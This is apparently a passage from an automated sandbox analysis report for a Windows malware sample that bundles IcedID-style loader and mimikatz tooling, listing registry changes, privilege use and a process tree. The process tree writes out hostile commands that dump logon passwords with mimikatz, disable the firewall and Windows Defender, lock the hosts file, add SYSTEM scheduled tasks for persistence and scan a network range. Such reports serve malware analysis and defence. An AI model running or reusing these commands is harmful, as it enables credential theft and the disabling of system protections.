\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs arblnql.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a2-b7-2d-f4-3d-a1\WpadDecision = "0" arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7EC843E0-8A68-4C69-BBC9-487FD2A1F10F}\WpadDecisionTime = 2005293784a6da01 arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals teqnffvbl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7EC843E0-8A68-4C69-BBC9-487FD2A1F10F}\WpadDecisionTime = 808d196d84a6da01 arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a2-b7-2d-f4-3d-a1\WpadDecisionTime = 2005293784a6da01 arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" teqnffvbl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a2-b7-2d-f4-3d-a1\WpadDetectedUrl arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates arblnql.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" arblnql.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a2-b7-2d-f4-3d-a1\WpadDecisionReason = "1" arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates arblnql.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" arblnql.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 arblnql.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 arblnql.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2184 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2708 arblnql.exe 3760 arblnql.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1796 arblnql.exe Token: SeDebugPrivilege 2736 arblnql.exe Token: SeDebugPrivilege 2296 vfshost.exe Token: SeAuditPrivilege 1464 svchost.exe Token: SeDebugPrivilege 584 teqnffvbl.exe Token: SeShutdownPrivilege 584 teqnffvbl.exe Token: SeLockMemoryPrivilege 1004 pbjnmw.exe Token: SeLockMemoryPrivilege 1004 pbjnmw.exe Token: SeDebugPrivilege 2616 teqnffvbl.exe Token: SeShutdownPrivilege 2616 teqnffvbl.exe Token: SeDebugPrivilege 1696 teqnffvbl.exe Token: SeShutdownPrivilege 1696 teqnffvbl.exe Token: SeDebugPrivilege 1996 teqnffvbl.exe Token: SeShutdownPrivilege 1996 teqnffvbl.exe Token: SeDebugPrivilege 2512 teqnffvbl.exe Token: SeShutdownPrivilege 2512 teqnffvbl.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 1796 arblnql.exe 1796 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 784 xohudmc.exe 2988 rifzsk.exe 2708 arblnql.exe 2708 arblnql.exe 3760 arblnql.exe 3760 arblnql.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2964 wrote to memory of 1592 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 28 PID 2964 wrote to memory of 1592 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 28 PID 2964 wrote to memory of 1592 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 28 PID 2964 wrote to memory of 1592 2964 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe 28 PID 1592 wrote to memory of 2184 1592 cmd.exe 30 PID 1592 wrote to memory of 2184 1592 cmd.exe 30 PID 1592 wrote to memory of 2184 1592 cmd.exe 30 PID 1592 wrote to memory of 2184 1592 cmd.exe 30 PID 1592 wrote to memory of 1796 1592 cmd.exe 31 PID 1592 wrote to memory of 1796 1592 cmd.exe 31 PID 1592 wrote to memory of 1796 1592 cmd.exe 31 PID 1592 wrote to memory of 1796 1592 cmd.exe 31 PID 2736 wrote to memory of 2740 2736 arblnql.exe 33 PID 2736 wrote to memory of 2740 2736 arblnql.exe 33 PID 2736 wrote to memory of 2740 2736 arblnql.exe 33 PID 2736 wrote to memory of 2740 2736 arblnql.exe 33 PID 2740 wrote to memory of 2788 2740 cmd.exe 35 PID 2740 wrote to memory of 2788 2740 cmd.exe 35 PID 2740 wrote to memory of 2788 2740 cmd.exe 35 PID 2740 wrote to memory of 2788 2740 cmd.exe 35 PID 2740 wrote to memory of 2660 2740 cmd.exe 36 PID 2740 wrote to memory of 2660 2740 cmd.exe 36 PID 2740 wrote to memory of 2660 2740 cmd.exe 36 PID 2740 wrote to memory of 2660 2740 cmd.exe 36 PID 2740 wrote to memory of 2696 2740 cmd.exe 37 PID 2740 wrote to memory of 2696 2740 cmd.exe 37 PID 2740 wrote to memory of 2696 2740 cmd.exe 37 PID 2740 wrote to memory of 2696 2740 cmd.exe 37 PID 2740 wrote to memory of 2236 2740 cmd.exe 38 PID 2740 wrote to memory of 2236 2740 cmd.exe 38 PID 2740 wrote to memory of 2236 2740 cmd.exe 38 PID 2740 wrote to memory of 2236 2740 cmd.exe 38 PID 2740 wrote to memory of 2560 2740 cmd.exe 39 PID 2740 wrote to memory of 2560 2740 cmd.exe 39 PID 2740 wrote to memory of 2560 2740 cmd.exe 39 PID 2740 wrote to memory of 2560 2740 cmd.exe 39 PID 2740 wrote to memory of 2892 2740 cmd.exe 40 PID 2740 wrote to memory of 2892 2740 cmd.exe 40 PID 2740 wrote to memory of 2892 2740 cmd.exe 40 PID 2740 wrote to memory of 2892 2740 cmd.exe 40 PID 2736 wrote to memory of 2576 2736 arblnql.exe 41 PID 2736 wrote to memory of 2576 2736 arblnql.exe 41 PID 2736 wrote to memory of 2576 2736 arblnql.exe 41 PID 2736 wrote to memory of 2576 2736 arblnql.exe 41 PID 2736 wrote to memory of 2600 2736 arblnql.exe 43 PID 2736 wrote to memory of 2600 2736 arblnql.exe 43 PID 2736 wrote to memory of 2600 2736 arblnql.exe 43 PID 2736 wrote to memory of 2600 2736 arblnql.exe 43 PID 2736 wrote to memory of 1336 2736 arblnql.exe 45 PID 2736 wrote to memory of 1336 2736 arblnql.exe 45 PID 2736 wrote to memory of 1336 2736 arblnql.exe 45 PID 2736 wrote to memory of 1336 2736 arblnql.exe 45 PID 2736 wrote to memory of 2880 2736 arblnql.exe 47 PID 2736 wrote to memory of 2880 2736 arblnql.exe 47 PID 2736 wrote to memory of 2880 2736 arblnql.exe 47 PID 2736 wrote to memory of 2880 2736 arblnql.exe 47 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 2880 wrote to memory of 3032 2880 cmd.exe 49 PID 3032 wrote to memory of 1932 3032 wpcap.exe 50
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:920
-
C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe"C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bezsyzlb\arblnql.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2184
-
-
C:\Windows\bezsyzlb\arblnql.exeC:\Windows\bezsyzlb\arblnql.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1796
-
-
-
C:\Windows\bezsyzlb\arblnql.exeC:\Windows\bezsyzlb\arblnql.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2696
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2560
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2892
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Modifies data under HKEY_USERS
PID:2576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2600
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:1336
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yvpqryzbb\qedqqjtfy\wpcap.exe /S2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\yvpqryzbb\qedqqjtfy\wpcap.exeC:\Windows\yvpqryzbb\qedqqjtfy\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵PID:1932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1680
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵PID:1132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:1036
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵PID:2520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2624
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1528
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1160
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2852
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2728
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2056
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yvpqryzbb\qedqqjtfy\befughplr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yvpqryzbb\qedqqjtfy\Scant.txt2⤵
- Loads dropped DLL
PID:684 -
C:\Windows\yvpqryzbb\qedqqjtfy\befughplr.exeC:\Windows\yvpqryzbb\qedqqjtfy\befughplr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yvpqryzbb\qedqqjtfy\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yvpqryzbb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\yvpqryzbb\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1356 -
C:\Windows\yvpqryzbb\Corporate\vfshost.exeC:\Windows\yvpqryzbb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmmnbyznn" /ru system /tr "cmd /c C:\Windows\ime\arblnql.exe"2⤵PID:780
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bmmnbyznn" /ru system /tr "cmd /c C:\Windows\ime\arblnql.exe"3⤵
- Creates scheduled task(s)
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yeblbvstq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F"2⤵PID:1044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yeblbvstq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfvtmynqr" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F"2⤵PID:2004
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfvtmynqr" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2476
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Modifies data under HKEY_USERS
PID:2012
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Modifies data under HKEY_USERS
PID:1200
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3064
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Modifies data under HKEY_USERS
PID:1776
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Modifies data under HKEY_USERS
PID:2644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Modifies data under HKEY_USERS
PID:2708
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2244
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Modifies data under HKEY_USERS
PID:2532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3012
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Modifies data under HKEY_USERS
PID:1572
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Modifies data under HKEY_USERS
PID:2884
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:1976
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1680
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1808
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1944
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:1992
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1516
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2624
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:2088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2492
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1732
-
